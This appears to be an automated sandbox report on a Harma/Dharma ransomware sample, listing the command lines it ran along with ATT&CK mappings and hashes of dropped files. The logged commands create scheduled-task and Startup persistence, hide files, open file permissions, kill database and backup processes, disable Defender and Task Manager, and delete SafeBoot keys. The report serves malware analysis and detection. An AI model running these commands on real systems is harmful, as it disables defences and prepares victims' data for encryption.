C:\Users\Admin\AppData\Local\Temp\VirusShare_5c36e305d926e55ef98d392176890cd2.exe
"C:\Users\Admin\AppData\Local\Temp\VirusShare_5c36e305d926e55ef98d392176890cd2.exe"
1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4892

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN DHARMA /TR C:\ProgramData\harma.exe /RU SYSTEM /RL HIGHEST /F
2⤵
- Suspicious use of WriteProcessMemory
PID:4848

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN DHARMA /TR C:\ProgramData\harma.exe /RU SYSTEM /RL HIGHEST /F
3⤵
- Creates scheduled task(s)
PID:4224

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c copy C:\ProgramData\harma.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe"
2⤵
- Drops startup file
PID:4604

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c copy C:\ProgramData\harma.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe"
2⤵
PID:520

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN DHARMA /TR C:\ProgramData\harma.exe /F
2⤵
- Suspicious use of WriteProcessMemory
PID:760

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN DHARMA /TR C:\ProgramData\harma.exe /F
3⤵
- Creates scheduled task(s)
PID:3108

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:4648

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe"
3⤵
- Drops startup file
- Views/modifies file attributes
PID:4776

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN hrm /TR "C:\Users\Admin\AppData\Local\Temp\VirusShare_5c36e305d926e55ef98d392176890cd2.exe" /RU SYSTEM /RL HIGHEST /F
2⤵
- Suspicious use of WriteProcessMemory
PID:3828

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN hrm /TR "C:\Users\Admin\AppData\Local\Temp\VirusShare_5c36e305d926e55ef98d392176890cd2.exe" /RU SYSTEM /RL HIGHEST /F
3⤵
- Creates scheduled task(s)
PID:4396

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN Harma /TR "C:\Users\Admin\AppData\Local\Temp\VirusShare_5c36e305d926e55ef98d392176890cd2.exe" /F
2⤵
- Suspicious use of WriteProcessMemory
PID:1892

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN Harma /TR "C:\Users\Admin\AppData\Local\Temp\VirusShare_5c36e305d926e55ef98d392176890cd2.exe" /F
3⤵
- Creates scheduled task(s)
PID:3336

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s harma.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:4580

C:\Windows\system32\attrib.exe
attrib +h +s harma.exe
3⤵
- Views/modifies file attributes
PID:2972

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\harma.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:4596

C:\Windows\system32\attrib.exe
attrib +h +s C:\ProgramData\harma.exe
3⤵
- Views/modifies file attributes
PID:1316

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
2⤵
- Suspicious use of WriteProcessMemory
PID:948

C:\Windows\system32\cmd.exe
cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
3⤵
- Suspicious use of WriteProcessMemory
PID:4660

C:\Windows\system32\icacls.exe
icacls * /grant Everyone:(OI)(CI)F /T /C /Q
4⤵
- Modifies file permissions
PID:376

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
2⤵
- Suspicious use of WriteProcessMemory
PID:5044

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
3⤵
PID:1632

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit
2⤵
- Suspicious use of WriteProcessMemory
PID:432

C:\Windows\system32\cmd.exe
cmd.exe /c taskkill /t /f /im sql*
3⤵
- Suspicious use of WriteProcessMemory
PID:2576

C:\Windows\system32\taskkill.exe
taskkill /t /f /im sql*
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2268

C:\Windows\system32\taskkill.exe
taskkill /f /t /im veeam*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3504

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Copy HRMPRIV C:\ProgramData\HRMPRIV
2⤵
PID:2044

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Copy HRMPUB C:\ProgramData\HRMPUB
2⤵
PID:2504

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Copy id.harma C:\ProgramData\id.harma
2⤵
PID:1900

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Copy C:\ProgramData\HRMPRIV %userprofile%\Desktop\HRMPRIV
2⤵
PID:2488

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\FILES ENCRYPTED.txt" "%userprofile%\Desktop\FILES ENCRYPTED.txt"
2⤵
PID:1556

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
2⤵
- Suspicious use of WriteProcessMemory
PID:812

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
3⤵
PID:4376

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
2⤵
PID:1860

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
3⤵
PID:1296

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
2⤵
PID:5036

C:\Windows\system32\reg.exe
reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
3⤵
PID:548

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
2⤵
PID:3672

C:\Windows\system32\reg.exe
reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
3⤵
PID:1292

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Hidden Files and Directories

T1158

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

File Permissions Modification

T1222

Hidden Files and Directories

T1158

Credential Access

Discovery

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\HRMPRIV
Filesize
2KB

MD5
bf0e30b4c55d60e7085e86ff1932e30b

SHA1
71af833cd0019cbea79e932ef052c0ac9683e318

SHA256
2c73567da81e5845cb99cb7656ae4e14490fff188b1bc03c34dd389e6a39a8bc

SHA512
9d63df3ab76ad93d1a8a295cca3e766323ba19b98ad65f50c5c89335a5c8680f77f8c4e616c103f32ea3ee29758e82281734771e0ddc746df29d1ad2bc31408d

Download Submit
C:\ProgramData\HRMPRIV
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
C:\ProgramData\HRMPRIV
Filesize
2KB

MD5
bf0e30b4c55d60e7085e86ff1932e30b

SHA1
71af833cd0019cbea79e932ef052c0ac9683e318

SHA256
2c73567da81e5845cb99cb7656ae4e14490fff188b1bc03c34dd389e6a39a8bc

SHA512
9d63df3ab76ad93d1a8a295cca3e766323ba19b98ad65f50c5c89335a5c8680f77f8c4e616c103f32ea3ee29758e82281734771e0ddc746df29d1ad2bc31408d

Download Submit
C:\ProgramData\HRMPUB
Filesize
292B

MD5
0f90c484ac7f6b0a31d865938924b613

SHA1
ce52261791b73e18aad9a4428be4d820027ebb12

SHA256
9cacd0c806abfe186f5118b8064bf8c514fff4ec01d907d9033fae07da3fc2d1

SHA512
54deb853704c6f222b61488641d630f95445bbd9a9c92c938e322eb21a98f5adf688cbd9be14e6e50e101ad0b4e2b3cb8eb320ca5c12199ff5bad53764a33717

Download Submit
C:\ProgramData\HRMPUB
Filesize
292B

MD5
0f90c484ac7f6b0a31d865938924b613

SHA1
ce52261791b73e18aad9a4428be4d820027ebb12

SHA256
9cacd0c806abfe186f5118b8064bf8c514fff4ec01d907d9033fae07da3fc2d1

SHA512
54deb853704c6f222b61488641d630f95445bbd9a9c92c938e322eb21a98f5adf688cbd9be14e6e50e101ad0b4e2b3cb8eb320ca5c12199ff5bad53764a33717

Download Submit
C:\ProgramData\HRMPUB
Filesize
292B

MD5
0f90c484ac7f6b0a31d865938924b613

SHA1
ce52261791b73e18aad9a4428be4d820027ebb12

SHA256
9cacd0c806abfe186f5118b8064bf8c514fff4ec01d907d9033fae07da3fc2d1

SHA512
54deb853704c6f222b61488641d630f95445bbd9a9c92c938e322eb21a98f5adf688cbd9be14e6e50e101ad0b4e2b3cb8eb320ca5c12199ff5bad53764a33717

Download Submit
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\harma.exe
Filesize
1.0MB

MD5
5c36e305d926e55ef98d392176890cd2

SHA1
64a15cdf89b6c8b85cba355b6944074614d810fd

SHA256
5671112c276673ee5c4630994ac0034927cee2aa05a32ca6950edbc80c56e7e8

SHA512
082855fadbe445ab1f582bb7773276c08bded82ecd00ae1651b620aa12e97315d01acea3cfbe99c504d6d74ce1cff471a4993ff8ebb93416df787cefa88baf1b

Download Submit
C:\ProgramData\harma.exe
Filesize
1.0MB

MD5
5c36e305d926e55ef98d392176890cd2

SHA1
64a15cdf89b6c8b85cba355b6944074614d810fd

SHA256
5671112c276673ee5c4630994ac0034927cee2aa05a32ca6950edbc80c56e7e8

SHA512
082855fadbe445ab1f582bb7773276c08bded82ecd00ae1651b620aa12e97315d01acea3cfbe99c504d6d74ce1cff471a4993ff8ebb93416df787cefa88baf1b

Download Submit
C:\ProgramData\id.harma
Filesize
8B

MD5
a36517509f645e8aea79e33fa2db6c26

SHA1
6168d2d97c7358eec6e3ab93eba545873fdc1755

SHA256
d0f3db3269809b72162fc5c82e116fa0f7a54f896c1df208518cbd3faa64579a

SHA512
9c3d67a80f70510d421c04008a2e5fe75e9dbde08ddc27f1197f29dcd043055dc4a9a231abbfe9b9262b2785a4c47b0b5281d01cfa81d4a9165427849d925bb4

Download Submit
C:\Users\Admin\AppData\Local\Temp\HRMPRIV
Filesize
2KB

MD5
bf0e30b4c55d60e7085e86ff1932e30b

SHA1
71af833cd0019cbea79e932ef052c0ac9683e318

SHA256
2c73567da81e5845cb99cb7656ae4e14490fff188b1bc03c34dd389e6a39a8bc

SHA512
9d63df3ab76ad93d1a8a295cca3e766323ba19b98ad65f50c5c89335a5c8680f77f8c4e616c103f32ea3ee29758e82281734771e0ddc746df29d1ad2bc31408d

Download Submit
C:\Users\Admin\AppData\Local\Temp\HRMPUB
Filesize
292B

MD5
0f90c484ac7f6b0a31d865938924b613

SHA1
ce52261791b73e18aad9a4428be4d820027ebb12

SHA256
9cacd0c806abfe186f5118b8064bf8c514fff4ec01d907d9033fae07da3fc2d1

SHA512
54deb853704c6f222b61488641d630f95445bbd9a9c92c938e322eb21a98f5adf688cbd9be14e6e50e101ad0b4e2b3cb8eb320ca5c12199ff5bad53764a33717

Download Submit
C:\Users\Admin\AppData\Local\Temp\id.harma
Filesize
8B

MD5
a36517509f645e8aea79e33fa2db6c26

SHA1
6168d2d97c7358eec6e3ab93eba545873fdc1755

SHA256
d0f3db3269809b72162fc5c82e116fa0f7a54f896c1df208518cbd3faa64579a

SHA512
9c3d67a80f70510d421c04008a2e5fe75e9dbde08ddc27f1197f29dcd043055dc4a9a231abbfe9b9262b2785a4c47b0b5281d01cfa81d4a9165427849d925bb4

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe
Filesize
1.0MB

MD5
5c36e305d926e55ef98d392176890cd2

SHA1
64a15cdf89b6c8b85cba355b6944074614d810fd

SHA256
5671112c276673ee5c4630994ac0034927cee2aa05a32ca6950edbc80c56e7e8

SHA512
082855fadbe445ab1f582bb7773276c08bded82ecd00ae1651b620aa12e97315d01acea3cfbe99c504d6d74ce1cff471a4993ff8ebb93416df787cefa88baf1b

Download Submit